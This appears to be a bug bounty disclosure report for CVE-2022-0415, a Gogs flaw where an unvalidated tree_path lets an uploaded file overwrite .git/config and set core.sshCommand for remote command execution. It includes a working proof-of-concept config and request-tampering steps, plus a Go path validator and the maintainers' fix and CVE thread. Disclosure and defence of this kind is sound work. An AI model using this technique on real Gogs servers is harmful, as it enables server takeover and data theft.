Remote Command Execution in uploading repository file in gogs/gogs

Valid

Reported on

Mar 11th 2022


Description

When uploading a file to a repository in Gogs, the tree_path parameter is not validated. An attacker can set tree_path=/.git/ to upload a file into the repository's .git directory.

Overwriting the .git/config file and setting core.sshCommand in it leads to remote command execution.

Proof of Concept

Create a repository in Gogs, then upload a file named config to the repository through the web page with the following content:

[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    ignorecase = true
    precomposeunicode = true
    sshCommand = echo pwnned > /tmp/poc
[remote "origin"]
    url = git@github.com:torvalds/linux.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
    remote = origin
    merge = refs/heads/master

Intercept the HTTP POST request that submits the form, and set the parameter to tree_path=/.git/ in the request body.

A file containing the text pwnned is then created at /tmp/poc.
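The root cause above is a tree_path that is accepted as-is. The following Go function is an added illustration of the check a server-side upload handler should apply, written for this report and not taken from Gogs or from the fix referenced below; the function name ValidateTreePath is an assumption. It normalises the path and refuses any path whose segments enter a .git directory.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// ValidateTreePath normalises a user-supplied tree_path and rejects values
// that would place an uploaded file inside the repository's .git directory.
// Added illustration for this report; not Gogs's own code.
func ValidateTreePath(treePath string) (string, error) {
	// Normalise separators, then let path.Clean collapse "." and ".." segments.
	// Prefixing "/" makes ".." unable to climb above the repository root.
	cleaned := path.Clean("/" + strings.ReplaceAll(treePath, "\\", "/"))
	cleaned = strings.TrimPrefix(cleaned, "/")

	for _, seg := range strings.Split(cleaned, "/") {
		// Compare case-insensitively so ".GIT" is also refused on
		// case-insensitive filesystems.
		if strings.EqualFold(seg, ".git") {
			return "", fmt.Errorf("tree path %q enters a .git directory", treePath)
		}
	}
	return cleaned, nil
}

func main() {
	// Constructed sample inputs: the report's payload, two variants, and a benign path.
	for _, p := range []string{"/.git/", "../.git/config", "src/.GIT/hooks", "/docs/../src/"} {
		cleaned, err := ValidateTreePath(p)
		fmt.Printf("%-18q -> cleaned=%q err=%v\n", p, cleaned, err)
	}
}
```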

Impact

This vulnerability allows executing commands on the remote server and gaining a privileged user account, which leads to sensitive data exposure, identity theft, etc.

We are processing your report and will contact the gogs team within 24 hours. 2 months ago
Joe Chen validated this vulnerability 2 months ago
E99p1ant has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the gogs team. We will try again in 7 days. 2 months ago
Joe Chen confirmed that a fix has been merged on 0fef3c 2 months ago
The fix bounty has been dropped
repo_editor.go#L490-L495 has been validated
E99p1ant
2 months ago

Maintainer


@admin Hi, can you assign a CVE ID for this report? Thanks.

Jamie Slome
2 months ago

Admin


Hi @wuhan005 - before we assign and publish a CVE here, we require the permission of the maintainer.

@maintainer - are you happy for a CVE to be assigned and published for this report?

Joe Chen
2 months ago

Maintainer


Yes, it would be great to have a CVE assigned and published for this report!

Jamie Slome
2 months ago

Admin


CVE-2022-0415 assigned and published! 🎊

E99p1ant
2 months ago

Maintainer


Thanks a lot!
